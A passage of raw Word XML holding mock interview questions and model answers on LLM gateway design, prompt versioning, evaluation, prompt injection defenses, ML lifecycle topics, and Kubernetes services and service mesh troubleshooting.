        <w:t>A: Design it as a normal production service plus LLM-specific controls. Put an API gateway in front for auth, quotas, request validation, and tenant identification. Route requests by use case to the right model: cheap/fast model for simple tasks, stronger model for complex tasks, fallback model for provider failures, and self-hosted model where privacy or cost requires it. Add caching for repeated deterministic prompts, token budgets per team, prompt/template versioning, safety filters, and guardrails around tool calls. Observability should capture trace ID, model version, prompt template version, token count, latency by stage, retrieval metadata, error type, and cost without logging sensitive raw prompts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Mock 50 focus - LLM gateway: How would you build an internal gateway that handles auth, per-team token budgets, prompt templates, model fallback, audit logs, and provider abstraction?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Gateway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build a proxy service between applications and model providers. It authenticates callers, maps them to teams/projects, enforces rate limits and token budgets, injects approved prompt templates, and routes to configured models. It should abstract providers such as Vertex AI, OpenAI, Anthropic, or self-hosted vLLM so applications do not hardcode provider logic. Add retries, timeouts, circuit breakers, fallback rules, audit logs, cost attribution, and dashboards. For safety, restrict which teams can use which models, prevent logging secrets, and require approval for high-risk tools or external data sharing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Mock 50 focus - prompt lifecycle: How would you version, test, review, deploy, and roll back prompt changes like application code?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Prompt Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Store prompts in Git with owners, version numbers, changelogs, and environment-specific configuration. Every prompt change should run against a regression dataset with expected behavior, groundedness checks, safety checks, latency/cost checks, and human review for high-risk flows. Deploy prompts gradually using feature flags or config rollout, track prompt version in every trace/log, and keep old prompt versions available for rollback. The key interview point is that prompt changes can break production like code changes, so they need review, tests, rollout, observability, and rollback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Mock 50 focus - LLM evaluation: How would you design automated and human evaluation for answer quality, groundedness, toxicity, latency, and regression testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use layered evaluation. Automated tests should include fixed golden questions, expected source references, rubric-based LLM-as-judge scoring, toxicity/safety checks, hallucination or groundedness checks, latency, token cost, and exact-match tests where applicable. Human evaluation should review samples for correctness, tone, safety, and business usefulness, especially for ambiguous or regulated use cases. Track scores over time and block deployment when a prompt/model change regresses beyond thresholds. Keep evaluation data versioned so results are comparable across releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Mock 50 focus - prompt injection and data leakage: How would you protect an LLM application from malicious input, unsafe tool calls, PII leakage, and retrieved-document injection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat user input and retrieved documents as untrusted data, never as instructions. Use strong system prompts, clear delimiters, content filtering, tool allowlists, schema validation, and permission checks outside the model. Do not give the model broad credentials; tools should use least privilege and require confirmation for destructive actions. Redact PII/secrets before prompts and logs, restrict which documents can be retrieved by user/team authorization, and monitor for injection patterns. The strongest control is not a clever prompt; it is limiting what the model can access or do if the prompt is bypassed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Mock 50 focus - self-hosted vs managed LLMs: How would you choose between Vertex AI/Gemini, OpenAI API, and self-hosted vLLM or Ollama on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use managed APIs such as Vertex AI/Gemini or OpenAI when you want fast adoption, strong model quality, low platform operations, and managed scaling. Use self-hosted vLLM/TGI/Ollama on Kubernetes when data residency, cost at scale, latency control, custom models, or offline/private operation matter enough to justify GPU operations. Compare model quality, token cost, p95 latency, throughput, privacy, compliance, operational burden, GPU availability, autoscaling, and fallback options. Many production platforms use both: managed APIs for high-quality general tasks and self-hosted models for private, high-volume, or cost-sensitive workloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Mock 50 focus - fine-tuning vs RAG: When would you fine-tune an LLM instead of using RAG or prompt engineering, and what operational risks would you manage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Fine-Tuning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use prompt engineering for behavior or formatting changes when the base model already knows the task. Use RAG when answers need current, private, or auditable knowledge from documents. Use fine-tuning when you need the model to learn a repeatable style, domain-specific classification, extraction format, or task behavior from many examples. Fine-tuning adds risks: dataset quality, bias, overfitting, model versioning, evaluation, rollback, cost, and retraining. It is not a good way to inject frequently changing factual knowledge; RAG is usually better for that.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Mock 50 focus - machine learning fundamentals: Explain supervised learning, unsupervised learning, and reinforcement learning with practical examples.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Machine Learning Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Supervised learning trains on labeled examples, such as predicting churn from customer records or classifying incidents as high or low priority. Unsupervised learning finds patterns without labels, such as clustering customers, detecting anomalies, or reducing dimensionality. Reinforcement learning trains an agent to take actions and receive rewards or penalties, such as game playing, robotics, or policy optimization. In interviews, connect the learning type to the data available: labels imply supervised, hidden structure implies unsupervised, and sequential decisions with rewards imply reinforcement learning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Mock 50 focus - ML lifecycle: Walk through the end-to-end machine learning lifecycle from problem framing to data collection, training, deployment, monitoring, and retraining.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Machine Learning Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with problem framing: define business objective, prediction target, success metric, constraints, and risk. Then collect and validate data, engineer features, split train/validation/test sets, train candidate models, evaluate offline metrics and business relevance, package the model, register it with lineage, deploy through canary/shadow/A/B if needed, and monitor latency, errors, drift, data quality, prediction quality, and business KPIs. Retraining should be triggered by schedule, new labels, drift, or performance degradation, but production promotion still needs validation and rollback controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Mock 50 focus - feature engineering: What is feature engineering, why does it matter, and how do you avoid training-serving skew?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Feature Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Feature engineering means transforming raw data into useful model inputs: aggregations, encodings, normalization, time-window features, text embeddings, missing-value handling, and domain-specific signals. It matters because model quality often depends more on useful features than algorithm choice. To avoid training-serving skew, reuse the same feature definitions in training and inference, version features, validate schemas, monitor freshness, and use a feature store or shared transformation library where appropriate. Always record feature version and data time range in model lineage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Mock 50 focus - ML model evaluation: How would you choose metrics such as accuracy, precision, recall, F1, ROC-AUC, RMSE, and business KPIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Model Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Choose metrics based on problem type and business cost of errors. Accuracy is useful only when classes are balanced and errors have similar cost. Precision matters when false positives are expensive, such as unnecessary fraud blocks. Recall matters when false negatives are expensive, such as missing fraud or incidents. F1 balances precision and recall. ROC-AUC helps compare ranking ability across thresholds. RMSE/MAE fit regression problems. Always connect technical metrics to business KPIs such as revenue, risk, support tickets, latency, or user experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Mock 50 focus - overfitting and underfitting: How do you detect overfitting or underfitting, and what actions would you take?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Model Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Overfitting means the model performs well on training data but poorly on validation or production data. Detect it through train-validation metric gaps, unstable cross-validation, and poor generalization. Fix it with more data, regularization, simpler models, dropout, pruning, early stopping, or better validation splits. Underfitting means the model is too simple or lacks useful features, causing poor training and validation performance. Fix it with better features, a more expressive model, longer training, less regularization, or improved data quality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Mock 50 focus - model drift: Explain data drift, concept drift, prediction drift, and how you would monitor and respond to each in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ML Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Data drift is a change in input feature distribution. Concept drift is a change in the relationship between inputs and target, so old patterns no longer predict outcomes. Prediction drift is a change in model output distribution. Monitor feature distributions, schema, missing values, embedding distribution, prediction distribution, delayed ground-truth metrics, and business KPIs. Respond based on impact: investigate data pipeline changes, compare against seasonality, retrain with fresh data, roll back feature/model changes, or adjust thresholds. Do not retrain automatically on every drift alert without validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Mock 50 focus - model deployment strategy: How would you deploy a new ML model safely using canary, shadow, A/B testing, rollback, and champion-challenger patterns?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ML Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use shadow deployment when you want the new model to receive live inputs without affecting users. Use canary to send a small percentage of traffic and watch latency, errors, model metrics, and business KPIs. Use A/B testing to compare business outcomes between model versions. Use champion-challenger when a candidate must beat the current production model before promotion. Keep rollback simple by retaining prior model artifacts and routing config. For ML, rollback criteria must include business and quality metrics, not only infrastructure health.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Mock 50 focus - bad model incident: A model is technically healthy but business KPIs suddenly drop after release. How would you investigate and mitigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ML Incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Open an incident and check the release timeline, model version, feature version, traffic split, customer segments, and business metric drop. Compare old vs new predictions, input distributions, confidence scores, feature freshness, training-serving skew, and any upstream data changes. If the drop aligns with the model release, pause rollout or roll back to the previous champion while investigation continues. Preserve evidence: model version, data sample, metrics, and traces. After mitigation, update evaluation gates so the missed business failure becomes a pre-production or canary check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Mock 50 focus - ML platform design: What shared platform capabilities would you build for data scientists and ML engineers to ship models safely and repeatedly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ML Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build shared capabilities across the lifecycle: data access patterns, data validation, feature store or reusable feature pipelines, experiment tracking, model registry, pipeline orchestration, CI/CD/CT, containerized training, model serving, monitoring, drift detection, approval workflows, rollback, security, and cost visibility. The platform should provide golden paths so teams do not reinvent infrastructure, but still allow flexibility for different model types. Strong platform answers include reproducibility, lineage, tenant isolation, least privilege, observability, and self-service developer experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 51 - Kubernetes Services, Service Mesh, AKS/GKE, and Terraform Loops Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is kube-proxy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kube-proxy is the Kubernetes node-level networking component that watches Services and Endpoints/EndpointSlices, then programs forwarding rules so traffic sent to a Service virtual IP or NodePort is routed to one of the matching backend Pods. Depending on the mode, it uses iptables, IPVS, or platform-specific mechanisms to implement service load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Suppose there are two Pods running in different namespaces. What DNS name would you use so that one Pod can communicate with the other?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the Service DNS name, not the raw Pod IP. For a Service named backend in namespace app2, a Pod in another namespace can call backend.app2.svc.cluster.local, or usually backend.app2. The full Kubernetes DNS pattern is &lt;service-name&gt;.&lt;namespace&gt;.svc.cluster.local.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. There are two applications, a frontend application and a backend application, running in two different Pods. What configuration would you write so that the frontend application starts only after the backend application is up and running?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In Kubernetes you should not rely on strict Pod startup order for application correctness. Expose the backend through a Service, configure readiness/startup probes on the backend, and make the frontend either retry until the backend Service is ready or use an initContainer that waits for the backend endpoint before starting the main frontend container. For production, readiness probes plus application-level retry/backoff are safer than only an initContainer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. We mostly follow blue-green deployment. How do you divert traffic from the Blue environment to the Green environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run both blue and green versions in parallel, validate the green version, then switch the traffic routing layer from blue to green. In Kubernetes this is commonly done by updating the Service selector from labels like version: blue to version: green, or by changing an Ingress/service mesh/load balancer route. Keep blue running briefly so rollback is just switching the selector or route back.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How do Kubernetes Services work, and when would you use ClusterIP, NodePort, LoadBalancer, or headless Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Kubernetes Service gives stable networking in front of dynamic Pods by selecting ready endpoints through labels and exposing them through a stable DNS name and virtual IP. Use ClusterIP for internal service-to-service traffic, NodePort mainly for simple external exposure or as a building block behind a load balancer, LoadBalancer when the cloud provider should provision an external or internal load balancer, and a headless Service when clients need direct Pod DNS records, often for StatefulSets or service discovery systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Scenario: A frontend Pod cannot reach a backend Service in another namespace. How would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with the DNS name and namespace: the frontend should call something like backend.backend-namespace.svc.cluster.local. Then verify the Service exists, its selector matches the backend Pod labels, endpoints or EndpointSlices are populated, backend Pods are Ready, and NetworkPolicies are not blocking traffic. Use kubectl get svc,endpoints,endpointslice,pods -n &lt;namespace&gt;, test DNS with nslookup from a debug Pod, and test connectivity with curl or nc before checking app logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is service mesh, and when would you introduce Istio or Anthos Service Mesh into a Kubernetes platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Service Mesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A service mesh adds a dedicated traffic, security, and observability layer for service-to-service communication, usually through sidecars or ambient data-plane components. Introduce Istio or Anthos Service Mesh when teams need mTLS, traffic splitting, retries, timeouts, circuit breaking, request-level telemetry, or consistent policy across many services. Avoid adding it only because it is fashionable; it increases operational complexity, so the use case should justify the extra control plane, debugging model, and upgrade process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Scenario: After enabling service mesh mTLS, some services start failing. What would you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Service Mesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check whether both client and server workloads are injected into the mesh, whether PeerAuthentication is set to STRICT or PERMISSIVE, whether DestinationRules use the correct TLS mode, and whether any non-mesh workload is still calling a STRICT mTLS service. Then inspect sidecar logs, Envoy config, service identity, certificates, and policies. A practical mitigation is to roll out mTLS namespace by namespace in PERMISSIVE mode first, observe traffic, then move to STRICT once all callers are mesh-aware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you implement canary or blue-green deployment using Kubernetes Services and service mesh traffic splitting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: With plain Kubernetes Services, blue-green can be done by running two versions with different labels and switching the Service selector from blue to green after validation. With a service mesh, keep both versions behind the same Service and use routing rules such as Istio VirtualService and DestinationRule to split traffic by percentage, header, user segment, or version. For production, combine this with metrics-based rollback, readiness probes, dashboards, and a fast route or selector rollback path.</w:t>
